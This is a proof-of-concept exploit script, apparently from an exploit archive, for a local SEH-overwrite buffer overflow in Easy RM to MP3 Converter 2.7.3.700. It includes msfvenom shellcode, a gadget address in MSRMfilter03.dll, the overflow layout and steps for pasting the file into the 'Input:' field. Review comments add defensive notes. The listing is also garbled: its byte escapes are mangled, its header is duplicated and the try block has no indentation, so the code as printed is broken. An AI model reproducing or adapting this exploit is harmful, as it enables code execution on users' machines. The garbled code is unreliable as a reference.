# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- If the 'Preferences' window pops up, just click 'Cancel'
# 5.- Click 'Batch'
# 6.- Delete everything on the parameter 'Input:' and paste the clipboard there
# 7.- Select OK
# 8.- Some Windows message boxes will pop up, click OK.
# 9.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/

import struct
import sys

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes

# --- Payload ------------------------------------------------------------------
# The byte string assembled here is the msfvenom output named in the comment
# above (windows/exec, CMD=calc.exe, x86/alpha_mixed encoding); the author
# states it is 447 bytes and its effect on the target is to start calc.exe.
# NOTE(review): in this listing the `\x` byte escapes are garbled (they render
# as bare `xdb`, `xc4`, ...), so as printed each `xNN` is three ASCII characters
# rather than one byte. Treat the values below as a lossy copy of the original;
# do not derive detection signatures or byte-level analysis from this rendering.
buf = b""
buf += b"xdbxc4xd9x74x24xf4x58x50x59x49x49x49x49"
buf += b"x49x49x49x49x49x43x43x43x43x43x43x43x37"
buf += b"x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
buf += b"x51x32x41x42x32x42x42x30x42x42x41x42x58"
buf += b"x50x38x41x42x75x4ax49x4bx4cx6bx58x4dx52"
buf += b"x55x50x73x30x67x70x55x30x6cx49x4ax45x65"
buf += b"x61x69x50x62x44x6cx4bx76x30x46x50x4ex6b"
buf += b"x76x32x46x6cx6cx4bx52x72x65x44x6ex6bx72"
buf += b"x52x74x68x44x4fx4fx47x73x7ax64x66x65x61"
buf += b"x49x6fx4ex4cx47x4cx50x61x71x6cx34x42x66"
buf += b"x4cx71x30x6bx71x58x4fx44x4dx46x61x68x47"
buf += b"x4ax42x6cx32x51x42x63x67x4cx4bx76x32x72"
buf += b"x30x4ex6bx33x7ax35x6cx4cx4bx50x4cx32x31"
buf += b"x31x68x59x73x53x78x55x51x6bx61x70x51x4e"
buf += b"x6bx70x59x47x50x35x51x68x53x6ex6bx51x59"
buf += b"x37x68x6ax43x45x6ax62x69x6cx4bx54x74x6c"
buf += b"x4bx55x51x4ax76x76x51x39x6fx6cx6cx6bx71"
buf += b"x4ax6fx36x6dx77x71x6ax67x77x48x69x70x33"
buf += b"x45x7ax56x64x43x61x6dx68x78x45x6bx53x4d"
buf += b"x66x44x53x45x69x74x70x58x4ex6bx76x38x74"
buf += b"x64x77x71x38x53x52x46x6ex6bx34x4cx72x6b"
buf += b"x6ex6bx56x38x45x4cx57x71x38x53x6cx4bx75"
buf += b"x54x6ex6bx76x61x4ax70x4ex69x67x34x44x64"
buf += b"x31x34x51x4bx73x6bx43x51x30x59x51x4ax53"
buf += b"x61x59x6fx49x70x31x4fx33x6fx63x6ax6cx4b"
buf += b"x57x62x68x6bx6cx4dx73x6dx42x4ax33x31x4c"
buf += b"x4dx4fx75x4ex52x73x30x35x50x47x70x66x30"
buf += b"x51x78x35x61x4ex6bx42x4fx6fx77x59x6fx58"
buf += b"x55x4fx4bx4dx30x35x4dx75x7ax65x5ax63x58"
buf += b"x49x36x4fx65x6dx6dx6dx4dx79x6fx79x45x45"
buf += b"x6cx77x76x33x4cx57x7ax4fx70x6bx4bx69x70"
buf += b"x74x35x57x75x6dx6bx33x77x65x43x43x42x62"
buf += b"x4fx32x4ax37x70x53x63x79x6fx6ax75x33x53"
buf += b"x35x31x72x4cx61x73x54x6ex61x75x61x68x75"
buf += b"x35x57x70x41x41"

# --- SEH record overwrite -----------------------------------------------------
# Two little-endian 32-bit values (struct "<I") that end up on the exception
# registration record once the 9008-byte filler below has overrun the 'Input'
# buffer. The first value is not annotated by the author; the second is an
# address inside MSRMfilter03.dll, which the author's annotation records as
# built without SafeSEH, without ASLR and not rebased.
# Defender's note: that module property is the root enabler of this technique.
# The durable fix is vendor-side (link the DLL with /SAFESEH and /DYNAMICBASE,
# or retire the EOL product); at the OS level, SEHOP in Windows Exploit
# Protection validates the handler chain independently of per-module SafeSEH
# and is the generic mitigation for SEH overwrites. On a host, the observable
# is the converter raising exception dialogs / crashing (header step 8) on an
# abnormally long 'Input:' value, so crash telemetry for this binary is the
# signal to watch for.
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10025A2E) # 0x10025a2e : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)

# Final layout written to disk: 9008 bytes of "A" filler, the two SEH values,
# a 10-character run ("x41x49" five times -- escapes garbled as above), the
# payload, then 200 trailing "xff" units of padding.
# NOTE(review): `b""` bytes literals are concatenated with `str` here, which
# only works on Python 2 -- the print statements below confirm this script
# targets Python 2. Under Python 3 the module would not compile at all
# (print-statement syntax), so the TypeError would never be reached.
buffer = "A" * 9008 + nseh + seh + "x41x49" * 5 + buf + "xff" * 200

# Write the crafted value to poc.txt for manual paste into the 'Input:' field
# (see the steps in the header).
# NOTE(review): the four body lines of this `try` carry no indentation in the
# listing, which is itself a SyntaxError -- another sign of lossy extraction.
# The bare `except:` also hides the real failure reason (it catches
# KeyboardInterrupt too), and the file handle is not closed if write() raises.
try:
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
print "[+] The file has been created successfully!"

except:
print "[!] There has been an error while creating the file."